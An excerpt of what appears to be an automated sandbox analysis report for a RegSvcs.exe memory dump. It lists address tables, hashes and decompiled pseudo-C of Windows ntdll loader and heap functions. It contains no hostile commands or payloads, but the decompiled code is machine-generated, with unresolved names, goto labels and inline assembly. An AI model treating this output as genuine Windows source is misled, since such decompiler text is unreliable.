                                          0x0136193e
                                          0x013618e5
                                          0x0136194f
                                          0x01361952
                                          0x01361956
                                          0x0136195d
                                          0x01361961
                                          0x0136196d
                                          0x00000000
                                          0x0136196d
                                          0x0136188a
                                          0x0136188f
                                          0x01361891
                                          0x00000000
                                          0x00000000
                                          0x0136189d
                                          0x00000000
                                          0x0136189d
                                          0x0136184c
                                          0x01361859
                                          0x01361859
                                          0x0136185c
                                          0x00000000
                                          0x00000000
                                          0x01361851
                                          0x01361853
                                          0x01361855
                                          0x01361865
                                          0x01361865
                                          0x01361866
                                          0x01361868
                                          0x01361870
                                          0x00000000
                                          0x01361870
                                          0x01361857
                                          0x01361857
                                          0x0136185e
                                          0x00000000
                                          0x013616d2
                                          0x013616d2
                                          0x013616d5
                                          0x013616d5
                                          0x013616d8
                                          0x013616da
                                          0x013616dd
                                          0x013616e0
                                          0x013616e3
                                          0x013616e5
                                          0x01361808
                                          0x01361808
                                          0x01361809
                                          0x01361812
                                          0x01361817
                                          0x01361817
                                          0x00000000
                                          0x01361817
                                          0x013616eb
                                          0x013616ed
                                          0x00000000
                                          0x00000000
                                          0x013616f6
                                          0x013616f9
                                          0x013616ff
                                          0x01361701
                                          0x0136172c
                                          0x0136172c
                                          0x0136172f
                                          0x01361732
                                          0x01361734
                                          0x01361737
                                          0x0136173b
                                          0x0136175e
                                          0x0136175e
                                          0x01361761
                                          0x01361764
                                          0x0136176d
                                          0x01361774
                                          0x01361777
                                          0x0136177a
                                          0x0136177c
                                          0x0136177f
                                          0x01361781
                                          0x01361781
                                          0x01361784
                                          0x01361784
                                          0x0136177f
                                          0x0136178c
                                          0x01361791
                                          0x01361796
                                          0x01361799
                                          0x0136179c
                                          0x0136179e
                                          0x013617a5
                                          0x013617a9
                                          0x013617c9
                                          0x013617ce
                                          0x013617ab
                                          0x013617c1
                                          0x013617c6
                                          0x013617dc
                                          0x013617e3
                                          0x013617e8
                                          0x013617ee
                                          0x013617f1
                                          0x013617f5
                                          0x013617f7
                                          0x013617fe
                                          0x013617ff
                                          0x013617ff
                                          0x013617f5
                                          0x0136179c
                                          0x00000000
                                          0x01361764
                                          0x01361741
                                          0x01361746
                                          0x01361748
                                          0x00000000
                                          0x00000000
                                          0x01361754
                                          0x00000000
                                          0x01361754
                                          0x01361703
                                          0x01361710
                                          0x01361710
                                          0x01361713
                                          0x00000000
                                          0x00000000
                                          0x01361708
                                          0x0136170a
                                          0x0136170c
                                          0x0136171c
                                          0x0136171c
                                          0x0136171d
                                          0x0136171f
                                          0x01361727
                                          0x00000000
                                          0x01361727
                                          0x0136170e
                                          0x0136170e
                                          0x01361715
                                          0x00000000
                                          0x01361715
                                          0x013616cc
                                          0x01319a45
                                          0x01319a45
                                          0x01319a0e
                                          0x01319a1c
                                          0x01319a23
                                          0x0136167e
                                          0x0136167f
                                          0x01361681
                                          0x01361683
                                          0x01361684
                                          0x00000000
                                          0x01361684
                                          0x00000000
                                          0x01319aad
                                          0x01319aad
                                          0x01319ab0
                                          0x01319ab3
                                          0x01319ab3
                                          0x01319ab6
                                          0x00000000
                                          0x00000000
                                          0x01319ab8
                                          0x01319aba
                                          0x01319abc
                                          0x01319ac8
                                          0x01319ac8
                                          0x00000000
                                          0x01319abe
                                          0x01319abe
                                          0x01319ac0
                                          0x00000000
                                          0x01319ac0
                                          0x01319abc
                                          0x01319ad2
                                          0x00000000
                                          0x01319ad2
                                          0x01319aab

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 6ff002cb90e4c22e4c5717a6e7fa621493280a3febe6271a9c287e7e2f387e8f
                                          • Instruction ID: fdc374c66d029036f78b427a3ab7db4ce551dfaaba4085030c4ba770a7457dc5
                                          • Opcode Fuzzy Hash: 6ff002cb90e4c22e4c5717a6e7fa621493280a3febe6271a9c287e7e2f387e8f
                                          • Instruction Fuzzy Hash: F52203706002469FEB29CF2DC495B7ABBF9EF84708F18C469E5458B74AD774D884CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01308794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E01308794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0130934A() != 0) {
								_t159 = E0137A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x13e5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01375510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x13e5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0130849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01308999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01308999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x13e5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x13e5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01312280(_t92, 0x13e86cc);
															_t94 = E013C9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E013261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x13e5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01308A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x13e5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x13e5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0133F380(_t136, 0x12d1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01312280(_t108, 0x13e86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E013261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E013C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0130FFB0(_t118, _t156, 0x13e86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01339A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                          0x01308799
                                          0x0130879d
                                          0x013087a1
                                          0x013087a3
                                          0x013087a8
                                          0x013087c3
                                          0x013087c3
                                          0x013087c8
                                          0x013087d1
                                          0x013087d4
                                          0x013087d8
                                          0x013087e5
                                          0x013087ec
                                          0x01359bfe
                                          0x01359c00
                                          0x01359c02
                                          0x01359c08
                                          0x01359c0d
                                          0x01359c0f
                                          0x01359c14
                                          0x01359c2d
                                          0x01359c32
                                          0x01359c37
                                          0x01359c3a
                                          0x01359c3c
                                          0x01359c42
                                          0x01359c42
                                          0x01359c3c
                                          0x01359c02
                                          0x013087da
                                          0x013087df
                                          0x013087e3
                                          0x00000000
                                          0x00000000
                                          0x013087e3
                                          0x013087f2
                                          0x00000000
                                          0x013087fb
                                          0x013087fd
                                          0x013087fe
                                          0x0130880e
                                          0x0130880f
                                          0x01308810
                                          0x01308814
                                          0x0130881a
                                          0x0130881c
                                          0x0130881f
                                          0x01308821
                                          0x01308822
                                          0x01308824
                                          0x01308826
                                          0x0130882c
                                          0x0130882e
                                          0x01359c48
                                          0x01359c48
                                          0x01308834
                                          0x01308834
                                          0x01308837
                                          0x00000000
                                          0x00000000
                                          0x01308837
                                          0x0130882e
                                          0x0130883d
                                          0x01308840
                                          0x01308843
                                          0x01308846
                                          0x01308849
                                          0x0130884c
                                          0x0130884e
                                          0x01308850
                                          0x01308852
                                          0x01308854
                                          0x01308857
                                          0x013088b4
                                          0x013088b6
                                          0x013088b6
                                          0x01308859
                                          0x01308859
                                          0x01308859
                                          0x01308861
                                          0x01308866
                                          0x0130886a
                                          0x0130893d
                                          0x01308941
                                          0x00000000
                                          0x01308947
                                          0x01308947
                                          0x0130894a
                                          0x0130894c
                                          0x00000000
                                          0x01308952
                                          0x01308955
                                          0x0130895a
                                          0x0130895d
                                          0x0130895d
                                          0x0130895f
                                          0x01308961
                                          0x01308961
                                          0x01308968
                                          0x00000000
                                          0x00000000
                                          0x0130896a
                                          0x0130896b
                                          0x0130896e
                                          0x00000000
                                          0x01308970
                                          0x01308970
                                          0x01308970
                                          0x01308970
                                          0x01308972
                                          0x01308972
                                          0x01308974
                                          0x00000000
                                          0x0130897a
                                          0x0130897a
                                          0x0130897d
                                          0x00000000
                                          0x01308983
                                          0x01359c65
                                          0x01359c6d
                                          0x01359c72
                                          0x01359c75
                                          0x01359c75
                                          0x01359c82
                                          0x01359c86
                                          0x01359c87
                                          0x01359c88
                                          0x01359c89
                                          0x01359c8c
                                          0x01359c90
                                          0x01359c95
                                          0x01359c97
                                          0x01359ca0
                                          0x01359ca3
                                          0x01359ca9
                                          0x01359ca9
                                          0x00000000
                                          0x01359ca9
                                          0x01359ca3
                                          0x00000000
                                          0x01359c97
                                          0x0130897d
                                          0x00000000
                                          0x01308974
                                          0x01308988
                                          0x01308992
                                          0x01308996
                                          0x00000000
                                          0x01308996
                                          0x0130894c
                                          0x00000000
                                          0x01308870
                                          0x0130887b
                                          0x0130887d
                                          0x0130887f
                                          0x01308881
                                          0x01308884
                                          0x01308884
                                          0x01308886
                                          0x01308889
                                          0x0130888c
                                          0x0130888e
                                          0x01308891
                                          0x01308891
                                          0x01308898
                                          0x00000000
                                          0x00000000
                                          0x0130889a
                                          0x0130889b
                                          0x0130889e
                                          0x00000000
                                          0x00000000
                                          0x013088a0
                                          0x013088a8
                                          0x013088b0
                                          0x013088b2
                                          0x013088d3
                                          0x013088d5
                                          0x00000000
                                          0x013088d7
                                          0x013088db
                                          0x013088dc
                                          0x013088e0
                                          0x013088e8
                                          0x013088ee
                                          0x013088f0
                                          0x013088f3
                                          0x013088fc
                                          0x01308901
                                          0x01308906
                                          0x0130890c
                                          0x0130890c
                                          0x0130890f
                                          0x01308916
                                          0x01308917
                                          0x01308918
                                          0x01308919
                                          0x0130891a
                                          0x0130891f
                                          0x01308921
                                          0x01359c52
                                          0x01359c55
                                          0x01359c5b
                                          0x01359cac
                                          0x01359cc0
                                          0x01359cc0
                                          0x01359c55
                                          0x01308927
                                          0x01308927
                                          0x0130892f
                                          0x01308933
                                          0x00000000
                                          0x013088f5
                                          0x013088f5
                                          0x00000000
                                          0x013088f7
                                          0x013088f7
                                          0x013088fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013088fa
                                          0x013088f5
                                          0x013088f3
                                          0x00000000
                                          0x013088d5
                                          0x00000000
                                          0x013088b2
                                          0x013088c9
                                          0x00000000
                                          0x013088c9
                                          0x0130887f
                                          0x0130886a
                                          0x01308857
                                          0x01308852
                                          0x013088bf
                                          0x013088bf
                                          0x013087aa
                                          0x013087ad
                                          0x013087ae
                                          0x013087b4
                                          0x013087b5
                                          0x013087b6
                                          0x013087b8
                                          0x013087bd
                                          0x013087c1
                                          0x013087f4
                                          0x013087fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013087c1
                                          0x00000000

                                          Strings
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01359C18
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01359C28
                                          • LdrpDoPostSnapWork, xrefs: 01359C1E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: fa23c521459b328eff48b0af270ce75644533fb9135de130710064ab4266d543
                                          • Instruction ID: 017780902b6567f5f31d8d165dfa6ee32e97ca4d94b74b71d461618e04496fba
                                          • Opcode Fuzzy Hash: fa23c521459b328eff48b0af270ce75644533fb9135de130710064ab4266d543
                                          • Instruction Fuzzy Hash: D491F331E0021ADBEF2ADF5DD4A0AAA7BF5FF4471CB1441A9D905AB281D730EE11CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E0132AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0134D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x13e8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E013396E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E013A3C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E013396E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E012FB150();
							} else {
								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E012FB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E013B14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01317D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E013B1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01317D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E013B1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                          0x0132ac85
                                          0x0132ac88
                                          0x0132ac8a
                                          0x0132ac8d
                                          0x0132ac91
                                          0x0132ac99
                                          0x0132ac9c
                                          0x01369f57
                                          0x01369f5b
                                          0x01369f60
                                          0x01369f60
                                          0x0132aca8
                                          0x0132acae
                                          0x0132acda
                                          0x0132acde
                                          0x0132ace8
                                          0x0132aceb
                                          0x0132acee
                                          0x00000000
                                          0x0132acee
                                          0x0132acf6
                                          0x0132acb0
                                          0x0132acb0
                                          0x0132acbb
                                          0x0132acbd
                                          0x0132acc0
                                          0x0132acc5
                                          0x0132adae
                                          0x0132adb4
                                          0x0132adb4
                                          0x0132acd4
                                          0x0132acd8
                                          0x0132acf9
                                          0x0132acff
                                          0x0132ad04
                                          0x0132ad08
                                          0x0132ad09
                                          0x0132ad10
                                          0x0132ad12
                                          0x0132ad18
                                          0x01369f6f
                                          0x01369f74
                                          0x01369f76
                                          0x01369f7c
                                          0x01369f84
                                          0x01369f88
                                          0x01369f89
                                          0x01369f90
                                          0x01369f90
                                          0x01369f76
                                          0x0132ad1e
                                          0x0132ad24
                                          0x0132ad26
                                          0x0136a097
                                          0x0136a09b
                                          0x0136a0ba
                                          0x0136a0bf
                                          0x0136a09d
                                          0x0136a0b2
                                          0x0136a0b7
                                          0x0136a0c5
                                          0x0136a0c8
                                          0x0136a0cb
                                          0x0136a0d2
                                          0x00000000
                                          0x0132ad2c
                                          0x0132ad2c
                                          0x0132ad2f
                                          0x0132ad34
                                          0x0132ad36
                                          0x01369f97
                                          0x01369f9a
                                          0x00000000
                                          0x00000000
                                          0x01369fa9
                                          0x0132ad3e
                                          0x0132ad3e
                                          0x0132ad41
                                          0x01369fb3
                                          0x01369fb9
                                          0x01369fc0
                                          0x01369fd0
                                          0x01369fd0
                                          0x01369fc0
                                          0x0132ad4a
                                          0x0132ad50
                                          0x0132ad5c
                                          0x0132ad62
                                          0x0132ad68
                                          0x0132ad6b
                                          0x0132ad6d
                                          0x01369fda
                                          0x01369fdd
                                          0x00000000
                                          0x00000000
                                          0x01369fec
                                          0x00000000
                                          0x0132ad73
                                          0x0132ad73
                                          0x0132ad73
                                          0x0132ad75
                                          0x0132ad75
                                          0x0132ad78
                                          0x01369ff6
                                          0x01369ffc
                                          0x0136a003
                                          0x0136a00e
                                          0x0136a010
                                          0x0136a01b
                                          0x0136a01b
                                          0x0136a01b
                                          0x0136a038
                                          0x0136a038
                                          0x0136a003
                                          0x0132ad84
                                          0x0132ad89
                                          0x0132ad8c
                                          0x0132ad8e
                                          0x0136a042
                                          0x0136a045
                                          0x00000000
                                          0x00000000
                                          0x0136a054
                                          0x00000000
                                          0x0132ad94
                                          0x0132ad94
                                          0x0132ad94
                                          0x0132ad96
                                          0x0132ad96
                                          0x0132ad99
                                          0x0136a063
                                          0x0136a065
                                          0x0136a070
                                          0x0136a070
                                          0x0136a070
                                          0x0136a08d
                                          0x0136a08d
                                          0x0132ada4
                                          0x0132ada6
                                          0x00000000
                                          0x0132ada6
                                          0x0132ad8e
                                          0x0132ad6d
                                          0x0132ad3c
                                          0x0132ad3c
                                          0x00000000
                                          0x0132ad3c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132acd8

                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0136A0CD
                                          • HEAP: , xrefs: 0136A0BA
                                          • HEAP[%wZ]: , xrefs: 0136A0AD
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 8d5ffe79afea0cad8c7bc04c30bf61b30b9caca0306296f693712be09bbe97d9
                                          • Instruction ID: d6bf7605f1771dec9e454fc827a2fcd9b9519d5a657babf58ae7952a8a41051b
                                          • Opcode Fuzzy Hash: 8d5ffe79afea0cad8c7bc04c30bf61b30b9caca0306296f693712be09bbe97d9
                                          • Instruction Fuzzy Hash: D4810531204A94EFE726DB6CC894BAABBF8FF05718F0441A5E651DBB92D774E940CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131B73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E0131B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
